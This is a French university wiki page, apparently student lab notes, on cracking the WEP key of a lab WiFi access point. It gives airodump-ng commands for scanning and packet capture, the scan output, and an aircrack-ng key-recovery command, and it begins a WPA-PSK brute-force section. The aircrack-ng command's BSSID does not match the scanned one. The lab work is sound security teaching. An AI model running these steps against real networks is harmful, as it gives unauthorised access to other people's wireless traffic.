Atelier SysRes SE4 2025/2026 E10

De wiki-se.plil.fr
Aller à la navigation Aller à la recherche

Machines virtuelles

Configuration réseau

DNS/DNSSEC

Serveur Apache

Fail2Ban

Effraction WiFi

Cassage de clef WEP d’un point d’accès WiFi

Adresse MAC de cracotte10

Pour trouver l'adresse MAC de cracotte10, nous pouvons utiliser airodump-ng. Pour ce faire, nous devons tout d'abord trouver le nom de la carte réseau. On peut trouver cela via ip link.

J'obtiens alors wlan0, mais pour augmenter la vitesse de cassage, nous utiliserons une clé USB Wi-Pi qui nous attribuera le wlx40a5efd2140c

Ensuite, on scanne grâce à:

sudo airodump-ng wlx40a5efd2140c --essid cracotte10

Nous obtenons :

BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID

04:DA:D2:9C:50:59  -69        2        1    0   4   54e. WEP  WEP         cracotte10              

BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes

L'adresse MAC de cracotte10 est donc

04:DA:D2:9C:50:59

Récupération de données

Une fois l'adresse mac et le canal récupérés, nous pouvons récupérer un flux de données qui sera stocké dans un fichier .cap

sudo airodump-ng -c 4 --bssid 04:DA:D2:9C:50:59 wlx40a5efd2140c --write dump

Cassage de la clef WEP

Pendant que le fichier se remplit,

sudo aircrack-ng -b 04:DA:D2:9C:50:58 *.cap

Cassage de mot de passe WPA-PSK par force brute

Adresse MAC de kracotte10

44:AD:D9:5F:87:09  -72        3        0    0  13   54e. WPA2 CCMP   PSK  kracotte10

Sécurisation et accès WiFi par WPA2-EAP